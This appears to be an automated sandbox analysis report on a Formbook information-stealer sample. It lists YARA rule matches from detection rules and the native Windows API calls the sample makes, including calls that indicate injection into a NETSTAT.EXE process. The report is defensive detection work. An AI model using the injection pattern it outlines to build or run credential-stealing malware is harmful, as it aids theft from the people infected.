            Source: Yara matchFile source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Fu94e0b1TR.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 0_2_00F5D0640_2_00F5D064
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 0_2_00F5F2960_2_00F5F296
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 0_2_00F5F2980_2_00F5F298
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_004010306_2_00401030
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041B9DA6_2_0041B9DA
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041C2B06_2_0041C2B0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00408C706_2_00408C70
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041BC206_2_0041BC20
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00402D876_2_00402D87
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041C58D6_2_0041C58D
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00402D906_2_00402D90
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041BE926_2_0041BE92
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00402FB06_2_00402FB0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118F9006_2_0118F900
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01180D206_2_01180D20
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A41206_2_011A4120
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01251D556_2_01251D55
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B25816_2_011B2581
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119D5E06_2_0119D5E0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119841F6_2_0119841F
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012410026_2_01241002
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0119B0906_2_0119B090
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B20A06_2_011B20A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BEBB06_2_011BEBB0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A6E306_2_011A6E30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D66E3018_2_02D66E30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D7EBB018_2_02D7EBB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5B09018_2_02D5B090
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5841F18_2_02D5841F
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E0100218_2_02E01002
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D5D5E018_2_02D5D5E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02E11D5518_2_02E11D55
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D4F90018_2_02D4F900
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D40D2018_2_02D40D20
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D6412018_2_02D64120
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003DB9DA18_2_003DB9DA
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003DC2B018_2_003DC2B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003DBC2018_2_003DBC20
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003C8C7018_2_003C8C70
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003C2D9018_2_003C2D90
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003DC58D18_2_003DC58D
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003C2D8718_2_003C2D87
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003DBE9218_2_003DBE92
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003C2FB018_2_003C2FB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02D4B150 appears 32 times
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: String function: 0118B150 appears 35 times
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_004185B0 NtCreateFile,6_2_004185B0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00418660 NtReadFile,6_2_00418660
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_004186E0 NtClose,6_2_004186E0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00418790 NtAllocateVirtualMemory,6_2_00418790
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_004185AA NtCreateFile,6_2_004185AA
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_004186DA NtClose,6_2_004186DA
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041878A NtAllocateVirtualMemory,6_2_0041878A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_011C9910
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9540 NtReadFile,LdrInitializeThunk,6_2_011C9540
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C99A0 NtCreateSection,LdrInitializeThunk,6_2_011C99A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C95D0 NtClose,LdrInitializeThunk,6_2_011C95D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9840 NtDelayExecution,LdrInitializeThunk,6_2_011C9840
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9860 NtQuerySystemInformation,LdrInitializeThunk,6_2_011C9860
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C98F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_011C98F0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9710 NtQueryInformationToken,LdrInitializeThunk,6_2_011C9710
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9780 NtMapViewOfSection,LdrInitializeThunk,6_2_011C9780
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C97A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_011C97A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9FE0 NtCreateMutant,LdrInitializeThunk,6_2_011C9FE0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9A00 NtProtectVirtualMemory,LdrInitializeThunk,6_2_011C9A00
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9A20 NtResumeThread,LdrInitializeThunk,6_2_011C9A20
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9A50 NtCreateFile,LdrInitializeThunk,6_2_011C9A50
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_011C9660
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C96E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_011C96E0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011CAD30 NtSetContextThread,6_2_011CAD30
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9520 NtWaitForSingleObject,6_2_011C9520
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9950 NtQueueApcThread,6_2_011C9950
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9560 NtWriteFile,6_2_011C9560
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C99D0 NtCreateProcessEx,6_2_011C99D0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C95F0 NtQueryInformationFile,6_2_011C95F0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9820 NtEnumerateKey,6_2_011C9820
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011CB040 NtSuspendThread,6_2_011CB040
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C98A0 NtWriteVirtualMemory,6_2_011C98A0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011CA710 NtOpenProcessToken,6_2_011CA710
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9B00 NtSetValueKey,6_2_011C9B00
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9730 NtQueryVirtualMemory,6_2_011C9730
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9770 NtSetInformationFile,6_2_011C9770
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011CA770 NtOpenThread,6_2_011CA770
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9760 NtOpenProcess,6_2_011C9760
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011CA3B0 NtGetContextThread,6_2_011CA3B0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9610 NtEnumerateValueKey,6_2_011C9610
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9A10 NtQuerySection,6_2_011C9A10
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9650 NtQueryValueKey,6_2_011C9650
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9670 NtQueryInformationProcess,6_2_011C9670
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C9A80 NtOpenDirectoryObject,6_2_011C9A80
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C96D0 NtCreateKey,6_2_011C96D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D896D0 NtCreateKey,LdrInitializeThunk,18_2_02D896D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D896E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_02D896E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89650 NtQueryValueKey,LdrInitializeThunk,18_2_02D89650
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89A50 NtCreateFile,LdrInitializeThunk,18_2_02D89A50
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89660 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_02D89660
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89FE0 NtCreateMutant,LdrInitializeThunk,18_2_02D89FE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89780 NtMapViewOfSection,LdrInitializeThunk,18_2_02D89780
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89710 NtQueryInformationToken,LdrInitializeThunk,18_2_02D89710
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89840 NtDelayExecution,LdrInitializeThunk,18_2_02D89840
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89860 NtQuerySystemInformation,LdrInitializeThunk,18_2_02D89860
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D895D0 NtClose,LdrInitializeThunk,18_2_02D895D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D899A0 NtCreateSection,LdrInitializeThunk,18_2_02D899A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89540 NtReadFile,LdrInitializeThunk,18_2_02D89540
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89910 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_02D89910
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89A80 NtOpenDirectoryObject,18_2_02D89A80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89670 NtQueryInformationProcess,18_2_02D89670
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89610 NtEnumerateValueKey,18_2_02D89610
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89A10 NtQuerySection,18_2_02D89A10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89A00 NtProtectVirtualMemory,18_2_02D89A00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89A20 NtResumeThread,18_2_02D89A20
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D8A3B0 NtGetContextThread,18_2_02D8A3B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D897A0 NtUnmapViewOfSection,18_2_02D897A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89770 NtSetInformationFile,18_2_02D89770
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D8A770 NtOpenThread,18_2_02D8A770
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89760 NtOpenProcess,18_2_02D89760
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D8A710 NtOpenProcessToken,18_2_02D8A710
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89B00 NtSetValueKey,18_2_02D89B00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89730 NtQueryVirtualMemory,18_2_02D89730
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D898F0 NtReadVirtualMemory,18_2_02D898F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D898A0 NtWriteVirtualMemory,18_2_02D898A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D8B040 NtSuspendThread,18_2_02D8B040
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89820 NtEnumerateKey,18_2_02D89820
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D899D0 NtCreateProcessEx,18_2_02D899D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D895F0 NtQueryInformationFile,18_2_02D895F0
